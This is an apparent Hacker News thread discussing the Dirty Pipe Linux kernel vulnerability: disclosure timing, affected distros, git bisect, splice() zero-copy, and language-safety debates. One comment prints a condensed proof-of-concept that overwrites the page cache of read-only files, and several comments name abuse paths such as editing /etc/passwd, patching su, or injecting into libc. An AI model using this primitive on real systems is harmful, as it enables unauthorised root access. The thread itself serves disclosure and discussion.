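In case it's useful to anyone, a minimal sketch of the technique (illustrative only, not the original Solaris test program; the file name is made up and error handling is kept to a minimum):

    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>

    #define BLOCK_SIZE 4096
    #define WORDS_PER_BLOCK (BLOCK_SIZE / sizeof(uint64_t))
    #define NBLOCKS 1024

    int main(void)
    {
        uint64_t block[WORDS_PER_BLOCK];
        int fd = open("blocks.dat", O_RDWR | O_CREAT | O_TRUNC, 0600);
        if (fd < 0)
            return 1;

        /* Writer: fill every block with its own block number, repeated. */
        for (uint64_t i = 0; i < NBLOCKS; i++) {
            for (size_t j = 0; j < WORDS_PER_BLOCK; j++)
                block[j] = i;
            write(fd, block, sizeof(block));
        }

        /* Checker: any block whose contents don't match its position was
         * swapped or corrupted somewhere along the way. */
        lseek(fd, 0, SEEK_SET);
        for (uint64_t i = 0; i < NBLOCKS; i++) {
            if (read(fd, block, sizeof(block)) != (ssize_t)sizeof(block))
                return 1;
            for (size_t j = 0; j < WORDS_PER_BLOCK; j++)
                if (block[j] != i) {
                    fprintf(stderr, "block %llu contains counter %llu\n",
                            (unsigned long long)i, (unsigned long long)block[j]);
                    return 1;
                }
        }
        puts("all blocks in order");
        close(fd);
        return 0;
    }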


The fix was already merged into Android; however, there are millions of devices that will never be updated. The nice question: can this be used for temp-rooting? Vulnerabilities can be a blessing sometimes...


> there are millions of devices that will never be updated

Luckily, almost all (if not all) of these millions of devices which will never be updated never received the vulnerable version in the first place. The bug was only introduced in 5.8, and due to how hardware vendors work, phones are still stuck in the 4.19 age (or at best 5.4, but no 5.10 besides the Pixel 6).


Yes. I have a working exploit, but haven't published it (yet).


I maintain a ROM for primarily older devices; the big feature is automated kernel CVE patching. My patcher was able to patch the 15 affected devices I support, and I'll have builds up in the next few days. https://gitlab.com/divested-mobile/divestos-build/-/commit/5...


> The nice question: can this be used for temp-rooting? Vulnerabilities can be a blessing sometimes...

Based on the description, sounds like it should be quite possible.


It has been less than a month since fixes emerged for kernels, and your PoC exploit has already been released to the public. Should you not have waited at least a bit longer (for example 2 months) before disclosing this vulnerability, so that people/companies can keep up with patching? Don't they need more time to patch their servers and legacy systems etc. before this becomes yet another log4j exploitation fest? That is, if this really is the new dirty cow vuln.

I get responsible disclosure is important, but should we not give people some more opportunity to patch, which will always take some time?

Just curious.

Also, nice work and interesting find!


It's the absolute opposite. It's insane that this commit wasn't flagged as a patch for a major vulnerability. Why am I finding out about this now? Why is it now my job to comb through commits looking for hidden patches?

It puts me, as a defender, at an insane disadvantage. Attackers have the time, incentives, and skills to look at commits for vulns. I don't. I don't get paid for every commit I look at, I don't get value out of it.

This backwards process pushed by Greg KH and others upstream needs to die ASAP.


Personally, I just enable automatic security updates and forget about it.


Once the commit is in the kernel tree it's effectively public for those looking to exploit it. Combing recent commits for bug fixes for the platform you're targeting is exploitation 101.

The announcement only serves to let the rest of the public know about this and incentivize them to upgrade.


Max did everything right here, and in this case I’m not sure the distribution process exists to have done better.

(Thanks Max for handling this well and politely and for putting up with everyone’s conflicting opinions.)


FWIW, if it in any way comes off like I'm blaming Max for this, I'm not. Anyone blaming Max for how vulnerabilities are disclosed is completely ignorant of the kernel reporting process.


Just wanted to note that your replies come off as quite confrontational/aggressive. I think you have valid points, and it's clear that this topic is important to you, but you're heating up the atmosphere of the thread more than necessary.


That part I'm ok with. Upstream has treated security researchers with contempt for decades.


Why not three months? Why not six? I do not get it. How is this same conversation still happening? This was public the day the patch was sent to the list or pushed to a public git server. Do you think adversaries are sitting around waiting for a POC? Or for you to decide to get around to patching?

I can't help but physically shake my head as I write this. I can't imagine actually asking people to play pretend security-through-obscurity because folks still can't be arsed to implement some sort of reasonable update strategy. I have enough experience in tiny and huge shops to say that it's a matter of prioritization, and it's just a blatant form of technical debt and poor foresight.


You never know if it was already being exploited, but one thing is sure: once the patch gets merged, it's a race and only a matter of time before an exploit is written. Two weeks is already long and may leave distro users exposed, which is why it's important that it doesn't stay too long in the fridge. Ideally we should have a "patch day" every week that distros would align on. That would allow users to adapt to this and get prepared to apply fixes everywhere without having to wonder about which fix addresses what, and more importantly it would remove the surprise effect. The distros process doesn't make this possible at the moment.


>Let me briefly introduce how our log server works: In the CM4all hosting environment, all web servers (running our custom open source HTTP server) send UDP multicast datagrams with metadata about each HTTP request. These are received by the log servers running Pond, our custom open source in-memory database. A nightly job splits all access logs of the previous day into one per hosted web site, each compressed with zlib.

Via HTTP, all access logs of a month can be downloaded as a single .gz file. Using a trick (which involves Z_SYNC_FLUSH), we can just concatenate all gzipped daily log files without having to decompress and recompress them, which means this HTTP request consumes nearly no CPU. Memory bandwidth is saved by employing the splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).

Windows users can’t handle .gz files, but everybody can extract ZIP files. A ZIP file is just a container for .gz files, so we could use the same method to generate ZIP files on-the-fly; all we needed to do was send a ZIP header first, then concatenate all .gz file contents as usual, followed by the central directory (another kind of header).

Just want to say, these people are running a pretty impressive operation. Very thoroughly engineered system they have there.
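
For anyone wondering what that zero-copy path looks like in practice, here's a rough sketch of the usual splice() pattern (file -> pipe -> socket, since one end of a splice must be a pipe). This is a simplified illustration with a made-up function name, not CM4all's actual server code:

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <unistd.h>

    /* Move `len` bytes from file_fd (starting at `offset`) to sock_fd
     * without copying the data through userspace: splice() hands the
     * page-cache pages to the pipe and then on to the socket. */
    static int send_file_zero_copy(int file_fd, int sock_fd, off_t offset, size_t len)
    {
        int p[2];
        if (pipe(p) < 0)
            return -1;

        while (len > 0) {
            /* file -> pipe: the pipe buffers now reference page-cache pages */
            ssize_t n = splice(file_fd, &offset, p[1], NULL, len, SPLICE_F_MOVE);
            if (n <= 0)
                break;
            len -= (size_t)n;

            /* pipe -> socket */
            while (n > 0) {
                ssize_t m = splice(p[0], NULL, sock_fd, NULL, (size_t)n, SPLICE_F_MOVE);
                if (m <= 0)
                    goto out;
                n -= m;
            }
        }
    out:
        close(p[0]);
        close(p[1]);
        return len == 0 ? 0 : -1;
    }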


This is f*cking scary. Such simple code, so dangerous, and it works. You can trivially add an extra root user via /etc/{passwd|shadow}. There are tons of options for how to p0wn a system.

Please update your devices ASAP!


Eh, it’s a limited subset of kernel versions (ones unlikely to be used in those devices), and requires local execution privileges and access to the file system. Linux in general has had numerous security issues (as has every other OS), often requiring far less access.

Does it need patching? Of course. It’s not a privilege escalation remote code execution issue though, and even if it was, it would be on a tiny fraction of running devices right now.


> and even if it was, it would be on a tiny fraction of running devices right now.

That's correct and I misjudged the situation. Sorry!


Those unsupported devices probably don't run Linux 5.8 or later, they are likely on older versions. It would be really useful to have this vuln on them though, it would help with getting root so you can get control of your own device and install your own choice of OS.


You're right, I thought kernel 5.8 was a lot older than it actually is. I've edited my post.

Sorry!


This affects kernels from 5.8 and was fixed in 5.16.11, 5.15.25 and 5.10.102. Exploit code is public and available on the linked page.
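
If it helps with triage, here's a rough sketch of a check against those version ranges (a heuristic only: distro kernels routinely backport fixes without changing these numbers, so don't treat its answer as authoritative):

    #include <stdio.h>
    #include <sys/utsname.h>

    int main(void)
    {
        struct utsname u;
        int maj = 0, min = 0, patch = 0;

        if (uname(&u) != 0 || sscanf(u.release, "%d.%d.%d", &maj, &min, &patch) < 2)
            return 1;

        /* Affected: 5.8 and later, until 5.16.11 / 5.15.25 / 5.10.102. */
        int affected = 0;
        if (maj == 5 && min >= 8) {
            if (min == 10)
                affected = patch < 102;
            else if (min == 15)
                affected = patch < 25;
            else if (min == 16)
                affected = patch < 11;
            else if (min <= 14)
                affected = 1;   /* 5.8 - 5.14: no fixed stable release */
            /* 5.17+ was released with the fix already in */
        }

        printf("%s: %s\n", u.release,
               affected ? "in the affected range" : "not in the affected range");
        return 0;
    }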


It's disturbing that despite prior disclosure on distro lists, Ubuntu doesn't have an update available, with public exploits circulating now.


Debian stable (bullseye) is still vulnerable: https://security-tracker.debian.org/tracker/CVE-2022-0847


That page is not up-to-date, fix was released today:

https://lists.debian.org/debian-security-announce/2022/msg00...


It wasn't available via `apt-get update && apt-get dist-upgrade` as of when I drafted that comment, but I confirm that 5.10.92-2 seems to be released now.


Well the fix was released ~30 minutes ago, so that checks out. ;-)

The security-tracker site is now updated as well.


Others, note that the new archive name is 'stable-security'. You might need to update your pins if you upgraded from Buster and you're not seeing the update now. I put in a pull request to add it to the release notes.


< 5.8 not being affected is probably a saving grace for quite a few enterprises as I'd expect that LTS distributions may not have got that version included as yet.


CentOS 7 is already at 5.10 so it should affect lots of production systems


Are you by chance using a 3rd party kernel repo such as ElRepo to work around a limitation? Or could someone at your org be compiling a custom kernel?


*blinks*

*stares at kernel-3.10.0-1160.59.1.el7*


Is this a smartphone? I'm on 3.18!


How about Ubuntu?


The relevant CVE page returns a 500 error: https://github.com/canonical-web-and-design/ubuntu.com/issue...

21.10 appears to be lacking the patch.


The CVE page returns now, with a whole bunch of "needs triage".

https://ubuntu.com/security/CVE-2022-0847


I’m curious how git bisect was applied here. Wouldn’t you have to compile the whole kernel somehow and then run your test program using that kernel? Is that really what was done here?


Yes? This is faster and easier than you might think. Building a reasonably small kernel only takes ~a minute. People usually have fully automated git-bisect-run scripts for build & test in qemu.


Oh, interesting, did not know it could be so fast.


For me, at least, there's an important difference missing from the debate over the term "C/C++": compiling C code is always much faster than you would expect, but compiling C++ code is always much slower than you would expect...


And yet there's an ongoing effort to optimize the kernel compile time by rearranging all of the headers. On a modern machine with plenty of cores a kernel build is pretty quick, but they're talking about slicing 20% or more off the top.

It's always slower than we'd like.


Perhaps more importantly than being fast, it is scriptable. ("git bisect run" takes a shell command, runs it at each step, and interprets its exit code, so you could script everything including the kernel recompiles and walk away for a few hours.)
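
A hypothetical session for a case like this (the tags, script name, and qemu detail are illustrative):

    git bisect start
    git bisect bad  v5.8     # a kernel that shows the corruption
    git bisect good v5.7     # a kernel that does not
    # the script builds the kernel, boots it (e.g. in qemu), runs the
    # reproducer, and exits 0 for good, 1 for bad (125 = cannot test, skip)
    git bisect run ./build-boot-and-test.sh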


Yes, that's what I did.


The kernel is relatively easy to compile and install, so I would think that's exactly what they did.


Wouldn't this allow modifying a cached version of /sbin/su to nop the password check? This seems really easy to exploit for privilege escalation.


Yes. But you can also inject code into libc.so.6, and all running processes will have it.


Or /etc/passwd


Yes, it would. That is implied: being able to write arbitrary readable files means you can also edit the permission system itself.
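
For context, the primitive is roughly this shape (condensed from the public PoC in the write-up; the path, offset, and payload are illustrative, error handling is omitted, and it only does anything on an unpatched 5.8+ kernel):

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        /* 1. Fill, then drain, the pipe completely so every ring slot keeps
           the PIPE_BUF_FLAG_CAN_MERGE flag that write() set on it. */
        int p[2];
        pipe(p);
        char pad[4096];
        int slots = fcntl(p[1], F_GETPIPE_SZ) / sizeof(pad);
        for (int i = 0; i < slots; i++) write(p[1], pad, sizeof(pad));
        for (int i = 0; i < slots; i++) read(p[0], pad, sizeof(pad));

        /* 2. splice() at least one byte of a file we can merely read; the
           reused slot now points at the file's page cache page, but its
           stale flags are never reset (the bug). */
        int fd = open("/path/to/readable-file", O_RDONLY);
        loff_t off = 0;
        splice(fd, &off, p[1], NULL, 1, 0);

        /* 3. An ordinary write() to the pipe is wrongly "merged" into that
           page cache page, right after the spliced byte, even though the
           file was opened read-only. */
        write(p[1], "pwned", 5);
        return 0;
    }

Note the write only changes the page cache (the page is never marked dirty, so nothing is written back to disk), can't cross a page boundary, and can't grow the file.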


Excellent work and excellent write up Max. A feather in your cap to be proud of for sure.


Crazy. Just successfully pwnd my homelab box in the garage..

Exciting for the implications of opening many locked down consumer devices out there.

Nightmare for the greater cyber sec world...


> A ZIP file is just a container for .gz files

That doesn't sound right.


GZIP (.gz) and PKZIP (.zip) are both containers for DEFLATE. GZIP is barely a container with minimal metadata, whereas PKZIP supports quite a bit of metadata. Although you can’t quite concatenate GZIP streams to get a PKZIP file, it’s pretty close—if I recall correctly, you just chop off the GZIP header.


I'm past the edit period, but:

> if I recall correctly, you just chop off the GZIP header.

...to get the raw DEFLATE stream, that is. You still need to attach any necessary metadata for PKZIP, which Max mentions. Their approach for converting between the two is pretty clever: it's so elegant and simple that it seems obvious, but I never would have thought of it. Very nifty, @max_k!
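
A rough sketch of the layout, assuming the simplest possible gzip member (no FEXTRA/FNAME/FCOMMENT fields; the helper name is made up):

    /* Where the raw DEFLATE stream sits inside a minimal .gz file: after a
       10-byte header and before the 8-byte CRC32+ISIZE trailer. A ZIP local
       file header would carry the same CRC32 and sizes that the gzip trailer
       already contains, followed by that same stream. */
    static int deflate_range(long gz_size, long *start, long *end)
    {
        if (gz_size < 10 + 8)
            return -1;
        *start = 10;           /* skip magic, method, flags, mtime, xfl, os */
        *end = gz_size - 8;    /* stop before CRC32 + ISIZE */
        return 0;
    }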


Yeah, a gzip file is itself a container for a DEFLATE stream. Gzip files can contain metadata such as timestamps and comments.


Both PKZIP and gzip use DEFLATE: https://en.wikipedia.org/wiki/Deflate


Reminds me of SunOS 4.1.3 where you simply type in ‘+’ about 127 times at the “Login:” prompt and PRESTO-CHANGO … you get a root shell prompt.


Who says closed source doesn't have benefits?


Does this have a CVSS score yet? It seems really powerful and easy to exploit. And by easy to exploit I'm talking beginner CTF easy.


Once I fell victim to The Dirty Bong Vulnerability, when the cat knocked the bong over onto my Dell laptop's keyboard. Fortunately I had the extended warranty, and the nice repairwoman just smelled it, laughed at me, and cheerfully replaced the keyboard for free. No way Apple would have ever done that.


Extreme Debugger Par Excellence!

What a supérioritégrandeur!


Amazing write-up! This is a super example of a responsible disclosure.

I mean, compiling 17 kernels alone takes so long that most people would've given up in between.


> most people would've given up in between

Nah, that's the most fun part. Once you have one kernel that works and one that doesn't, you can be pretty sure that you'll eventually find the cause of the bug. The part where I would have given up is the "trying to reproduce" part.


Yeah, 17 loops is a small enough number that I honestly probably wouldn't bother figuring out how to automate git bisect and a test.

The real deal was tracking it down and creating a reproducible test.


Depends entirely on what sort of hardware you have. IIRC, I usually spend around 5 minutes when compiling Linux on my desktop, so not instant but not horrible. The agonizing part would be to have to manually install, boot and test those kernels, or to create a setup involving virtual machines which does that automatically to use `git bisect run`.

But yeah, incredibly impressive persistence.


What a poster child. Deserves some kind of award.


I like how they casually mention that they have basically written their entire stack themselves.


>Memory bandwidth is saved by employing the splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).

What are the memory savings of this splicing approach as compared to streaming [through userspace]?


What does "streaming buffers" mean? splice() avoids copying data from kernel to userspace and back; it stays in the kernel, and often isn't even copied at all, only page references are passed around.


67% savings. If an application reads a 1MB file the normal way, the kernel creates 1MB of buffers in the file system cache to hold the data. Then it copies the data to another 1MB of buffers which are owned by the application. If the application then writes the data out to a network socket, the kernel has to allocate another 1MB buffer to hold the data while it is being sent.

If the application were processing the data in some way, then it would be worth it. Otherwise it is better to skip all of that work.
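
A minimal sketch of the two approaches (descriptor names are illustrative, error handling and short-write loops omitted):

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <unistd.h>

    /* read()/write(): the same bytes occupy the page cache, a userspace
       buffer, and the socket buffers. */
    static void serve_copying(int file_fd, int sock_fd, size_t len)
    {
        char buf[65536];
        while (len > 0) {
            size_t want = len < sizeof(buf) ? len : sizeof(buf);
            ssize_t n = read(file_fd, buf, want);   /* page cache -> user */
            if (n <= 0) break;
            write(sock_fd, buf, n);                 /* user -> socket */
            len -= n;
        }
    }

    /* splice(): page cache pages are passed by reference through a pipe,
       so no userspace buffer and (ideally) no extra copies at all. */
    static void serve_zero_copy(int file_fd, int sock_fd, size_t len)
    {
        int p[2];
        pipe(p);   /* one end of splice() must be a pipe */
        while (len > 0) {
            ssize_t n = splice(file_fd, NULL, p[1], NULL, len, SPLICE_F_MOVE);
            if (n <= 0) break;
            splice(p[0], NULL, sock_fd, NULL, n, SPLICE_F_MOVE);
            len -= n;
        }
        close(p[0]);
        close(p[1]);
    }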


Wow, awesome debugging - very impressed.


Since so many distros seem to lag a good ways behind on packages, and this vulnerability (in its most easily exploited form) was introduced in kernel 5.8, it would seem a fair amount of Linux installs wouldn't actually be vulnerable to this. Is that somewhat correct?


Yes - ish. Depends on the distro. Ubuntu 20.04 has 5.4, for example, and I suspect many use that.


Wow, almost 10 months from the first reported file corruption until identification as an exploitable bug.


I'll bite, why the "Wow"?

It was a random, intermittent file corruption that didn't cause real harm to the author's organization and was, clearly, very tricky to track down.


I don't have a basis for how long this might take. As the author mentions, "All bugs become shallow once they can be reproduced." But getting there probably took the largest share of the time: waiting for new incident reports to come in, analyzing them (e.g. to determine that most incidents occurred on the last day of the month), and hours of staring at application and kernel code. It's very impressive, but certainly most of the 10-month duration was not spent actively debugging. The "moment of extraordinary clarity" probably sprang out of years of experience.


Ah, I guess my thinking is that they didn't really focus on it. It was annoying but not high priority ... until they started to get an inkling of what was actually going on.


Agreed, about 99% of admins I know would not be able to identify this error, and most likely most Hacker News readers couldn't either. The last sentence in your post is very true.


If not 99.999%

I've worked with (and been) a dev for several decades, and I can count on one hand the number of folks who would have a chance of figuring this out, and on two fingers the number who actually WOULD.

Of course, most never try to optimize or go so deep like this that they would ever need to, so there is that!


The sort of bug that could have been caught by unit tests I suppose.


Thank you for not selling this to the "industry"!


The sample code does not demonstrate how to get the page to be flagged dirty so that the kernel actually writes it back to disk. Did I miss something?


I assume you’d trigger a write some other way - if using this to mess with the shadow file, say, change your password at the same time to flush the file.


I think you're quite gifted at storytelling; you could be a thriller writer.


Dirty pipe.. how about "sewerbleed"?


The exploit involves DIRTY (should be written back to disk) memory pages attached to a PIPE between processes.


Yes... sewers are dirty pipes. "sewerbleed" is funnier than "dirty pipe", and it matches https://en.wikipedia.org/wiki/Heartbleed.


We all got the reference you were making; the problem is 'heart' 'bleed' is based around what could be considered the heart (rather than as is normally said, the brain) of a computer 'bleeding' data from one context to another.

In both cases the researchers chose sort of punny names that were also self descriptive and obvious once you read how to produce the exploit. 'Dirty Pipe' is literally the recipe for this exploit / corruption. Maybe your name seems funny to you for some reason that isn't obvious / shared.


C needs to die. Pro tip for language designers: require all fields to be initialized any time an object is created.

Really impressive debugging too.


> require all fields to be initialized any time an object is created

I'm not a fan of such a policy. That usually leads to people zero-initializing everything. For this bug, this would have been correct, but sometimes, there is no good "initial" value, and zero is just another random value like all the 2^32-1 others.

Worse, if you zero-initialize everything, valgrind will be unable to find accesses to uninitialized variables, which hides the bug and makes it harder to find. If I have no good initial value for something, I'd rather leave it uninitialized.
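
A contrived sketch of the distinction:

    void example(int want_compression)
    {
        int level;              /* no sensible default; if some path forgets to
                                   assign it, valgrind/MSan can flag the read */
        int bytes_written = 0;  /* zero is genuinely the right starting value */

        if (want_compression)
            level = 6;
        /* reading "level" on the other path is now a detectable bug instead
           of silently meaning "level 0" */
        (void)bytes_written;
    }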


> I'm not a fan of such a policy. That usually leads to people zero-initializing everything. For this bug, this would have been correct, but sometimes, there is no good "initial" value, and zero is just another random value like all the 2^32-1 others.

So use a language that has an option type, we've only had them for what, 50 years now.


I think https://news.ycombinator.com/item?id=30588362 has shown that this wouldn't solve anything for this particular case.


Mandatory explicit initialization, plus a feature to explicitly mark memory as having an undefined value, is a great way to approach this problem. You get the benefit in the majority of cases where you have a defined value you just forgot to set and the compiler errors until you set it, and for the "I know it's undefined, I don't have a value for it yet" case you have both mandatory explicit programmer acknowledgement and the opportunity for debug code to detect mistaken reads of this uninitialized memory.

But I think it would be troublesome to use such a hypothetical feature in C if it's only available in some compiler-specific dialect(s), because you need to coerce to any type, so it would be hard to hide behind a macro. What should it expand to on compilers without support? It would probably need lots of variants specific to scalar types, pointer types, etc., or lots of #if blocks, which would be unfortunate.

Zig is a nice language with this feature, and it fits into many of the same use cases as C: https://ziglang.org/documentation/0.9.1/#undefined


Actually, https://news.ycombinator.com/item?id=30588362 has convinced me this wouldn't necessarily solve the bug in question either, since it's a bug caused by (quite legitimately) re-using an existing value. Though it would be easy to implement a "free" operation by just writing `undefined`, so it would still help quite a bit, and more than suggestions like "just use an Optional/Maybe type".


GCC has recently introduced a mode (-ftrivial-auto-var-init) that will zero initialize all automatic variables by default while still treating them as UB for sanitize/warning purposes.

The issue is with dynamic memory allocation as that would be the responsibility of the allocator (and of course the kernel uses custom allocators).


Interesting compiler feature to work around (unknown) vulnerabilities similar to this one. However in this case, it wouldn't help; the initial allocation is with explicit zero-initialization, but this is a circular buffer, and the problem occurs when slots get reused (which is the basic idea of a circular buffer).


Would this get caught by KMSAN (https://github.com/google/kmsan)? Maybe the circular buffer logic would need to get some calls to `__msan_allocated_memory` and/or `__sanitizer_dtor_callback` added to it? If this could be made to work then it would ensure that this bug stays fixed and doesn't regress.


Yes, but as you said, it works only after adding such annotations to various libraries. A circular buffer is just a special kind of memory allocator, and as such, when it allocates and deallocates memory, it needs to tell the sanitizer about it.

What bothers me about the Linux code base is that there is so much code duplication; the pipe doesn't use a generic circular buffer implementation, but instead rolls its own. If you had the one true implementation, you'd add those annotations there, once, and all users would have it, and would benefit from KMSAN's deep insight.

Every time I hack Linux kernel code, I'm reminded how ugly plain C is, how it forces me to repeat myself (unless you enter macro hell, but Linux is already there). I wish the Linux kernel would agree on a subset of C++, which would allow making it much more robust and simpler.

They recently agreed to allow Rust code in certain tail ends of the code base; that's a good thing, but much more would be gained from allowing that subset of C++ everywhere. (Do both. I'm not arguing against Rust.)


Some good abstractions would really help with these kinds of allocators.


Why can't things like option types be used? That solves the issue as you'd either have `Some<FooType>` or `None`, which could be dealt with separately.


I love Rust, but would it have prevented this problem? IIUC there was no memory corruption at the language level here. This was really just a logic error.


Yes, it would have. Some code creates an instance of some struct, but doesn’t set the flags field to zero. It thus keeps whatever value happened to be in that spot in memory, an essentially random set of bits. Rust would force you to either explicitly name the flags field and give it a value, or use `..Default::default()` to initialize all remaining fields automatically. Anything else would be a compile–time error.

The fix:

    +++ b/lib/iov_iter.c
    @@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
       return 0;
    
      buf->ops = &page_cache_pipe_buf_ops;
    + buf->flags = 0;
      get_page(page);
      buf->page = page;
      buf->offset = offset;


No. Rust can not prevent this bug.

The bug is that they are reusing (or, repurposing) an already-allocated-and-used buffer and forgot to reset flags. This is a logic bug, not a memory safety bug.

In fact, this might be a prime example of "using Rust does not magically eliminate your temporal bugs because sometimes they are not about memory safety but logical". Before that my favorite such bug is a Use-After-Free in Redox OS's filesystem codes.

Pro tip for random HN Rust evangelist: read the fucking code before posting your "sHoUlD HAVe uSED A BeTTER lANGUAGE" shit.


This is only partially fair. In Rust you would probably have assigned a new object into *buf here instead of overwriting the fields manually. It is good practice to do this (if the code is logically an object initialization, it should actually be an object initialization, not a bunch of field assignments), but it's clunky to do so in C because you can't use initializers in assignments.


The point is: You could have done this in Rust, but you wouldn't have been required to do so, so the exact same logic bug could have emerged. Maybe it would be more Rust-like to write the code like that, but it would have also been possible to write the code like that in C - and since we're talking about the kernel here, even if this code was written in Rust a developer might have written it in the more C-like way for performance reasons.


People writing C don't re-use allocated objects because allocating fresh ones is clunky; they do it to improve performance. The general purpose allocators are almost always much slower than something where you know the pattern of allocations. I've no idea if Rust has a similar issue. I would think that most kernel code, whether C or Rust, would need to handle the "allocation fails" case and not depend on language constructs to do allocations, but that's just a guess.


I'm not saying you shouldn't reuse allocated objects. I'm talking about building a local object (no dynamic allocation) and assigning it to the pointer at once. This has the same runtime behavior (assuming -O1) as assigning the fields one by one.

See https://godbolt.org/z/Wh5KcTaGY for what I'm talking about, the local allocation is easily eliminated by the compiler.

The equivalent in C is to create a temporary local variable with an initializer list then write that variable to the pointer.


you can assign a new object into *buf in C just fine, with "*buf = (struct YourType){.prop1 = a, .prop2 = b}"; it even zero-initializes unset fields! So C and Rust give you precisely the same abilities here.

edit: the "struct pipe_buffer" in question[1] has one field that even the updated code doesn't write - "private". Not sure what it's about, but it's there. Not writing unrelated fields like that is probably not much of an issue now, but it certainly can add up on low-power systems. You might also have situations where you'd want to write parts of an object in different parts of the code, for which you'd have to resort to writing fields manually.

[1]: https://github.com/torvalds/linux/blob/719fce7539cd3e186598e...
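
A small illustration of the two styles (struct and function names are made up, not the kernel's):

    struct buf {
        const void *ops;
        unsigned flags;
        unsigned long private;
    };

    /* field-by-field: anything not mentioned (flags, private) keeps whatever
       stale value the previous user of the slot left behind */
    void reuse_fieldwise(struct buf *b, const void *ops)
    {
        b->ops = ops;
    }

    /* compound-literal assignment: all unnamed fields are zeroed */
    void reuse_compound(struct buf *b, const void *ops)
    {
        *b = (struct buf){ .ops = ops };
    }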


Oh I was not aware of this syntax in C, thanks for bringing it up! I still think the pattern is more common and known in Rust but I might be wrong :)

Re: your other points, "reusing a pre-allocated struct from a buffer" is basically object initialization, which is different from other times you want to write fields. In general an object initialization construct should be used in those cases, this whole thread being an argument why. Out-of-band fields such as the "private" field are a pain I agree, but they can be separated from an inner struct (in which case the inner struct is the only field that gets assigned for initialization).

Taking a step back, the true solution is probably to have a proper constructor... And that can be done in any language, so I'll stand corrected.


The question of safety is often much more about coding standards than actual language features. For a kernel, you'd be violating Rust's safety features left, right, and center (or have a slow kernel that just dies on OOM; choose one) and would have to come up with your own standards for preventing coding errors in those parts, which is what you already have with C.

To be clear, some base level of trivially safe code is certainly a nice-to-have. I just don't think the amount that helps for a kernel is that much, and the added boilerplate on more unsafe things might even obscure issues.


I think you need to have C99 for that, and the kernel is still using C89. If C needs to die, then C89 needs to die first :)


As far as I understand, the kernel uses C89 plus GNU extensions, because there definitely are usages of that syntax in the kernel. (My searching showed it being used only for defining globals, which is a weird convention, but I don't see anything preventing its use elsewhere if they wanted to.)

And there are recent plans to move the kernel to a newer C version anyway.


I agree with your sentiment. Only the most strict pure functional languages will prevent you from reusing objects.

You could argue that some languages distinguish raw memory from actual objects and even when reusing memory you would still go through an initialization phase (for example placement new in C++) that would take care of putting the object into a known default state.


> The bug is that they are reusing (or, repurposing) an already-allocated-and-used buffer and forgot to reset flags. This is a logic bug, not a memory safety bug.

This statement is incorrect. They are using an arena allocator, and there is no way for it to know if it is reusing one of the elements or using that element for the first time. To do this in Rust you would probably be using the MaybeUninit type: https://doc.rust-lang.org/std/mem/union.MaybeUninit.html

However, you are partly correct. In Rust, when using the MaybeUninit type, it is still possible to partially initialize an object and then return it as if it were fully initialized without hitting a compile error. https://doc.rust-lang.org/std/mem/union.MaybeUninit.html#ini...

If you do the whole struct at once, rather than one field at a time, then the compiler still has your back:

    let foo = unsafe {
      let mut uninit: MaybeUninit<Foo> = MaybeUninit::uninit();
      uninit.write(Foo {
        name: "Bob".to_string(),
        list: vec![0, 1, 2],
      });
      uninit.assume_init() // safe: every field was just written
    };


Ah thanks for explaining. I misunderstood the root cause and didn't read the patch. Rust definitely would have helped here. Or even just enforcing modern C practices such as overwriting the whole struct so that non-specified values would have been set to zero (although explicit is better than zero).


Wouldn't Lint have caught the error too?


buf is a pointer into a pipe_buffer array; this whole function reeks, yes, but I don't think this is a simple "initialization would have fixed it" bug:

buf = &pipe->bufs[i_head & p_mask];

I think it is a problem with merging and needing to reset the flags, but I didn't want to waste too much time trying to find the root issue and figure out what merging is / why it's done.


You can't accidentally leave a field of a struct uninitialized in Rust or in other sane languages.


btw. this is how I would make the code more robust: https://lore.kernel.org/lkml/20220225185431.2617232-4-max.ke...

I'm a C++ guy, and the lack of constructors is one of many things that bothers me with C.


I tend to agree, but only partially. I write a lot of init functions myself for plenty of stuff, but I've faced plenty of issues because these functions do not always initialize everything (and your patch above does exactly that, for a good reason), and that is much less obvious to those using them. If they initialize too much, they can be equally painful to work with. It's not uncommon to need 2 or 3 different init functions depending on what you're doing, but the name should explicitly indicate the promise, and that's where it gets difficult.


Then let's have those 2 or 3 documented init functions. That's not perfect, but still much better than spraying different (undocumented) copies of the init code everywhere, which then have to be located and adjusted every time somebody refactors something.


In any case, definitely ;-)


> Pro tip for language designers: require all fields to be initialized any time an object is created.

This proposal sounds great until you find out that this is a hard problem to solve reasonably well in the compiler and no matter what you do there will be valid programs that your compiler will reject.


No? This seems to work perfectly fine for other languages.

> valid programs that your compiler will reject.

Do you mean "valid programs where everything is initialized when an object is created will somehow fail to detect that"?


>Do you mean "valid programs where everything is initialized when an object is created will somehow fail to detect that"?

Valid programs where a field is left uninitialized at creation time, but the programmer makes sure it's initialized before it's used.


No, I don't think that this should be considered a valid program. I would never allow code that creates a partly-initialized struct in any codebase that I maintain.

I agree that it’s a hard problem, but I don’t think that language designers should use that as an excuse. I think that language designers should really double–down and require that every field be initialized, otherwise people will just forget. The code will be carefully written at first, but then someone new will come along and add a new field, and then the existing code is insufficient. With no errors from the compiler there is no way to ensure that the new programmer updates everything to accommodate the new field.

Rust does pretty well in this regard, but you can still use unsafe blocks to get a partly–initialized struct if you really want one. I like Rust, but I wish that it went all the way and didn’t allow it at all.


Sure, so we can easily change the definition of "valid" so that you have to initialize them at creation time. shrug


Google's Fuchsia/Zircon cannot come fast enough.


I wouldn't expect additional security from introducing an entirely new OS/kernel. Just unknown RCEs and other vulnerabilities waiting to be discovered.


Just like Linux, so no change there. We still need to move on.


Because they use formal methods preventing this kind of thing from happening?


Even with your formal methods strawman, vulnerabilities like these are still possible in Linux and C. We need to move on.


You can formally verify C code against a spec though.


Why not seL4 then?



